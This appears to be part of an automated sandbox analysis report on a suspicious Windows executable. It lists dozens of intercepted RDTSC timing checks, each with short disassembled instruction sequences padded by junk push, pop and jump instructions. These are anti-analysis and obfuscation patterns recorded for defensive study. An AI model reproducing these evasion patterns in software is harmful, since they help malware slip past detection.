Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7AD07 second address: B7AD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7AD0F second address: B7AD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD5E912DA09h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A6F7 second address: B7A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FD5E9559C76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A705 second address: B7A709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A86E second address: B7A872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A872 second address: B7A89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FD5E912D9E8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 jmp 00007FD5E912D9ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B7A89D second address: B7A8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B8C856 second address: B8C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD5E912D9E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B93DF5 second address: B93E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9A665 second address: B9A66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D283 second address: B9D28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D28C second address: B9D291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D291 second address: B9D2A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD5E9559C76h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD5E9559C76h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9D0F0 second address: B9D0FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E912D9EEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F63E second address: B9F652 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FD5E9559C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F652 second address: B9F666 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD5E912D9E6h 0x0000000e jc 00007FD5E912D9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B9F666 second address: B9F683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4DC8 second address: BA4DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4DD1 second address: BA4DDB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA4C6C second address: BA4C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD5E912D9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA82E second address: BAA84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E9559C89h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA84F second address: BAA867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA867 second address: BAA883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD5E9559C82h 0x0000000b ja 00007FD5E9559C76h 0x00000011 jc 00007FD5E9559C76h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA90C3 second address: BA90CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD5E912D9F7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA962C second address: BA9630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9630 second address: BA9642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007FD5E912D9E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9642 second address: BA9646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA98F9 second address: BA9906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9906 second address: BA990C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA990C second address: BA9910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A72 second address: BA9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FD5E9559C76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A84 second address: BA9A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A88 second address: BA9A8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A8E second address: BA9A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BA9A94 second address: BA9A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA54E second address: BAA552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA552 second address: BAA558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA558 second address: BAA568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007FD5E912D9E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAA568 second address: BAA574 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD5E9559C76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE353 second address: BAE359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE359 second address: BAE367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD5E9559C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE367 second address: BAE371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE371 second address: BAE377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE377 second address: BAE37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BADFE5 second address: BADFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BADFE9 second address: BAE00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD5E912D9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD5E912D9F3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE00D second address: BAE041 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD5E9559C76h 0x00000008 jmp 00007FD5E9559C89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD5E9559C81h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE041 second address: BAE049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BAE049 second address: BAE069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD27 second address: BEAD4C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD5E912DA00h 0x00000008 jmp 00007FD5E912D9F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD4C second address: BEAD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BEAD59 second address: BEAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FD5E912D9E6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnp 00007FD5E912D9E6h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FD5E912D9EDh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF161E second address: BF163E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD5E9559C76h 0x00000008 jmp 00007FD5E9559C83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF163E second address: BF1645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF1645 second address: BF164A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF164A second address: BF1650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14BD second address: BF14C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14C9 second address: BF14CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BF14CE second address: BF14D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED027 second address: BED036 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED036 second address: BED03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BED03A second address: BED03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFDB18 second address: BFDB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFDB1C second address: BFDB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD600 second address: BFD619 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD5E9559C7Fh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD619 second address: BFD61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD61F second address: BFD639 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD5E9559C76h 0x00000008 jns 00007FD5E9559C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007FD5E9559C7Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD773 second address: BFD77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD5E912D9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD77F second address: BFD78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FD5E9559C76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD78E second address: BFD792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD792 second address: BFD796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: BFD796 second address: BFD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FD5E912D9E6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC30FE second address: CC3104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3104 second address: CC3130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD5E912D9E6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FD5E912D9E6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD5E912D9F1h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3130 second address: CC3134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33B2 second address: CC33E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EFh 0x00000007 jns 00007FD5E912D9E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD5E912D9F8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC33E7 second address: CC33F7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 jnc 00007FD5E9559C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51093 second address: 6E51097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51097 second address: 6E5109D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5109D second address: 6E510A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510A3 second address: 6E510D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD5E912D9F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510D3 second address: 6E510D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510D9 second address: 6E510DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510DD second address: 6E510E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510E1 second address: 6E51121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD5E912D9EDh 0x00000012 xor si, 6526h 0x00000017 jmp 00007FD5E912D9F1h 0x0000001c popfd 0x0000001d mov esi, 50B7E657h 0x00000022 popad 0x00000023 mov dword ptr [edx+08h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51121 second address: 6E51127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51127 second address: 6E5112D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5112D second address: 6E51131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51131 second address: 6E511B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FD5E912D9F1h 0x00000012 pop eax 0x00000013 call 00007FD5E912D9F1h 0x00000018 mov ecx, 71674217h 0x0000001d pop eax 0x0000001e popad 0x0000001f mov dword ptr [edx+0Ch], eax 0x00000022 pushad 0x00000023 mov eax, edx 0x00000025 mov bx, FB88h 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007FD5E912D9F8h 0x00000035 pushfd 0x00000036 jmp 00007FD5E912D9F2h 0x0000003b sub ax, 9118h 0x00000040 jmp 00007FD5E912D9EBh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511B6 second address: 6E511BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511BC second address: 6E511C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511C0 second address: 6E511E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+10h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD5E9559C89h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511E8 second address: 6E511EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
